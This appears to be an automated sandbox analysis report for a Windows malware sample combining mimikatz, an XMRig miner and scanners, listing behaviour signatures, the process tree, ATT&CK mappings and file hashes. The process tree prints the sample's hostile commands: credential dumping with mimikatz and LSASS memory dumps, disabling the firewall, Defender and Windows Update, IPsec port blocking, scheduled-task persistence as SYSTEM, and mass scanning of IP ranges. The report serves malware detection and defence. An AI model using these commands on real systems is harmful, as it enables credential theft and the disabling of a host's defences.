Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
18-11-2024 18:33
General
-
Target
2024-11-18_ae27defc7ee16dea591de72530362bc5_hacktools_icedid_mimikatz.exe
-
Size
13.0MB
-
MD5
ae27defc7ee16dea591de72530362bc5
-
SHA1
eccd99ec894b85fe70641b45e463872a2bd93661
-
SHA256
a88675fafe701d33c0d336a0608cebbd494abc6bd016dd982e680540121e2eed
-
SHA512
f23ce1d234a7c8c71277c2af814359dc876500d460d6d37d65f4cd93928f168a1224e3f7ef5cf965a60945630774ad361129f22b2194bf471ed1cea40ef3b98b
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEP:a3jz0E52/iv1E3jz0E
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (18857) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\evfeutbbp\nfquyl.exe"C:\Windows\TEMP\evfeutbbp\nfquyl.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-18_ae27defc7ee16dea591de72530362bc5_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-18_ae27defc7ee16dea591de72530362bc5_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yqqdgivv\wlifiji.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\yqqdgivv\wlifiji.exeC:\Windows\yqqdgivv\wlifiji.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\yqqdgivv\wlifiji.exeC:\Windows\yqqdgivv\wlifiji.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\ysudwuiub\tluvwvuph\wpcap.exeC:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exeC:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ysudwuiub\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\ysudwuiub\Corporate\vfshost.exeC:\Windows\ysudwuiub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hqqdukrbq" /ru system /tr "cmd /c C:\Windows\ime\wlifiji.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hqqdukrbq" /ru system /tr "cmd /c C:\Windows\ime\wlifiji.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gihftdilj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gihftdilj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "telinbtbg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "telinbtbg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 756 C:\Windows\TEMP\ysudwuiub\756.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 1016 C:\Windows\TEMP\ysudwuiub\1016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2128 C:\Windows\TEMP\ysudwuiub\2128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2604 C:\Windows\TEMP\ysudwuiub\2604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2948 C:\Windows\TEMP\ysudwuiub\2948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2992 C:\Windows\TEMP\ysudwuiub\2992.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 672 C:\Windows\TEMP\ysudwuiub\672.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3752 C:\Windows\TEMP\ysudwuiub\3752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3880 C:\Windows\TEMP\ysudwuiub\3880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3956 C:\Windows\TEMP\ysudwuiub\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 4048 C:\Windows\TEMP\ysudwuiub\4048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 4316 C:\Windows\TEMP\ysudwuiub\4316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 2288 C:\Windows\TEMP\ysudwuiub\2288.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3040 C:\Windows\TEMP\ysudwuiub\3040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 1644 C:\Windows\TEMP\ysudwuiub\1644.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 3816 C:\Windows\TEMP\ysudwuiub\3816.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ysudwuiub\bteqliisl.exeC:\Windows\TEMP\ysudwuiub\bteqliisl.exe -accepteula -mp 212 C:\Windows\TEMP\ysudwuiub\212.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ysudwuiub\tluvwvuph\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ysudwuiub\tluvwvuph\kbebvutsd.exekbebvutsd.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\nspfso.exeC:\Windows\SysWOW64\nspfso.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wlifiji.exe1⤵
-
C:\Windows\ime\wlifiji.exeC:\Windows\ime\wlifiji.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\evfeutbbp\nfquyl.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\yqqdgivv\wlifiji.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
33.4MB
MD5a32a5684bcd8fe51c05b142cb0636d45
SHA199d2621bce7b16919cbd8eacd88f3d84e0562f82
SHA2564e399277cc56226ba247cf72a727e131efa6ad69353170e165fcf3ec405e3923
SHA512561a5f5f2cd038c6d99ce8a008a7639a1b9fbd217ed2cf0e111caf68ad576d593acc9f9752d03353077bbfe3b8bb3f8478d5f13435d502b9359861e37f465894
-
Filesize
4.2MB
MD53238102d2b74b038bf202a73af74ad7f
SHA19d740998a6fed06ebd2869e23c0609e7f80c31fb
SHA256949252fbfdb4b9dfa588b5085e4204796f1836d5759fc9794c644f848d5312da
SHA51263b57b8e928703c84c7aa63d7dd5690da4abd81e1cc7e5c7a405702b5539daa9d393bb9e5100b83477c5dd3c2bec1a4439ef138687ad65df94cafde4215870db
-
Filesize
25.8MB
MD5464addaf91cf7f925564a352e7535719
SHA12ce5dd48fb1dc1ff419225a012950e97d053e98c
SHA256076463052851c78a591701af79840740ad779436c0d288f3de12bab6a9974028
SHA512ba0cb6f75e84fa6c3ce4ef7bdd46e440d52630265949ad03140ecd31f73d2ecd0b182ed7d329eb44e861bd18737077d92b7ce9b8320563c16b6e6959576be8ae
-
Filesize
7.5MB
MD5adfb0d202eef106f3002c606c2ac5670
SHA1b4f7e4947fd4574c47a212127fd6e3cdaa09bf7b
SHA2561a1c0ac8f280912298105dbcc6d1f3dce9e6410782ac7dca0f81222b40565317
SHA512b62285b28436de331869a1c0944a29e1704e396c074ddac210c53aaa9e8989feef9693c53d43e52f45d652310a65a2749be8106ee1d974d6cb9785311d0cbc68
-
Filesize
797KB
MD52897b391505d767df37e3047c7f67c67
SHA1103eccb15252c7f5453c8ec038ea6eb122568c80
SHA256ebb7318c5f03fef68f276a2aeb7060b2a5c43cc2d9e36bb00444865c1f8de489
SHA512c3c6c64377926bec2cd70e0cc2c14bb60d7fe5a1dafd5b42d422e3f451a3319aa0140bc27a12892fdf997c352c5d78aae32c29750acc5023cb12aca09e498f77
-
Filesize
4.0MB
MD5521119f981181bbb19686cb95a642662
SHA10c6cab1ff9020b438424a25d9449646dbc0dd5a0
SHA256784d68096489452de7045e71ceec4426d00ac22e1bd32a317e23d0e04f5b522b
SHA5120a8408fad3559372766bc8f4a455749efe29d0e2a00b339e3e3aeb6acb6709ec76d17d0a4b325161360fde831efa7d4df6ff6950d5154e00bdb0988b94b5e491
-
Filesize
8.5MB
MD5481f445a736c0398ca73a3a274e43b20
SHA1b672b1f840a36c3c98d22bdc7492b71d8fd48dab
SHA256ae380116b6469dd5ffb26f25597a572ae2c22bce704fa7ad2cddc7361fed43ad
SHA51267b193b70c276e5649dcbfb16bc8f7d87db9b6c27db437e4ab68d555682d2c4b9119953c6c8cf8c39693d8480b6d4b00f470b9c3cf417b866c905f08526496f7
-
Filesize
2.5MB
MD539c5a7240b9e1d03c8716110a7e07f4e
SHA14886df66dbb6c34079ddd82d3ec0886161cbcded
SHA256a754b6849f1e4f3fe23535e0359b2f71d190b5d3f246b4d47edc8b6bf7b47d72
SHA5126546562b608adac6c7e5f35802a7b54139587499345d48737f2d06f0104ea060cfbc3e7ab1b30edc80fcbdf3210e637d91ac59b862a68a5f6b2d7cd7906a654d
-
Filesize
21.0MB
MD5e3a8246f39ba397af096f5cab097c3fa
SHA1c42d54a4be2fb71f4dd58454c97c0e8afd7024cc
